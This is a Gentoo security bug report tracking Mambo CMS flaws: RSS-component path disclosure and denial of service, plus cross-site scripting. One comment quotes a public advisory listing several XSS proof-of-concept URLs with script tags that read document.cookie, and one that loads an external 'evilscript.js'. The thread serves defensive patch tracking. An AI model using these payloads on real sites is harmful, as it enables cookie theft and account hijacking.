Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 130584 - www-apps/mambo - unvalidated user input in rss component (CVE-2006-195{6|7})
Summary: www-apps/mambo - unvalidated user input in rss component (CVE-2006-195{6|7})
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: High trivial
Assignee: Gentoo Security
URL:
Whiteboard: ~3 [noglsa]
Keywords:
Depends on:
Blocks:
 
Reported: 2006-04-20 03:48 UTC by Carsten Lohrke (RETIRED)
Modified: 2006-06-22 11:22 UTC (History)
1 user (show)

See Also:
Package list:
Runtime testing required: ---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Carsten Lohrke (RETIRED) gentoo-dev 2006-04-20 03:48:45 UTC 
The Script does not properly validate user-supplied input in rss.php.A remote user can supply a specially crafted URL to cause the system to display an error message that discloses the installation Path or force the script to create Tons of superfluous xml files which in some cases result in remote DoS attacks against target.


http://www.kapda.ir/advisory-313.html
Comment 1 Carsten Lohrke (RETIRED) gentoo-dev 2006-04-20 05:16:41 UTC 
Apparently this has been fixed in Joomla 1.0.8 (bug 124082), but not in Mambo.
Comment 2 Thierry Carrez (RETIRED) gentoo-dev 2006-04-21 09:57:39 UTC 
web-apps: not sure there is a fix published for this ?
Comment 3 Raphael Marichez (Falco) (RETIRED) gentoo-dev 2006-05-25 06:56:39 UTC 
Hi,

and XSS vuln has also been reported by rgod (http://archives.neohapsis.com/archives/bugtraq/2006-05/0491.html)

i don't fill a new bug beacuse AFAIK, this XSS vuln is still in [upstream] status, the gravity is minor (~4) , and the ebuild is ~arched.


Mambo <= 4.6. RC1 Cross Site Scripting

---------------------------------------

http://[target]/[path_to_mambo]/administrator/popups/index3pop.php?mosConfig_sitename=</title><script>alert(document.cookie)</script>
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_mce/popupImage.php?img_title=</title><script>alert(document.cookie)</script>
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/caption/colorpicker.php?cur_colour=--%3E%3C/script%3E%3C/head%3E%3Cbody%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/caption/colorpicker.php?func=--%3E%3C/script%3E%3C/head%3E%3Cbody%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/caption/colorpicker.php?block=--%3E%3C/script%3E%3C/head%3E%3Cbody%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/imgmanager/ImageManager/preview.php?image_src=http://location/evilscript.js
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/imgmanager/ImageManager/preview.php?img_title=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

---------------------------------------
rgod
site: http://retrogod.altervista.org
mail: rgod at autistici org
Comment 4 Raphael Marichez (Falco) (RETIRED) gentoo-dev 2006-05-25 06:57:24 UTC 
Concerning the RSS vuln, it's CVE-2006-1956 and CVE-2006-1957
Comment 5 Stuart Herbert (RETIRED) gentoo-dev 2006-05-31 00:31:21 UTC 
UPSTREAM have released Mambo 4.5.4 day before yesterday.  I'll snag a copy, and see if it addresses these problems.

Best regards,
Stu
Comment 6 Raphael Marichez (Falco) (RETIRED) gentoo-dev 2006-06-11 13:39:01 UTC 
(In reply to comment #5)
> UPSTREAM have released Mambo 4.5.4 day before yesterday.  I'll snag a copy, and
> see if it addresses these problems.
> 

Hi, Stuart; your conclusion ?
Comment 7 Renat Lumpau (RETIRED) gentoo-dev 2006-06-17 17:35:33 UTC 
4.5.4 is in the tree, 4.5.3h removed. From the changelog:

5. Patched a low risk RSS vulnerability
Comment 8 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2006-06-22 11:22:01 UTC 
Thx Renat. Closing with no GLSA.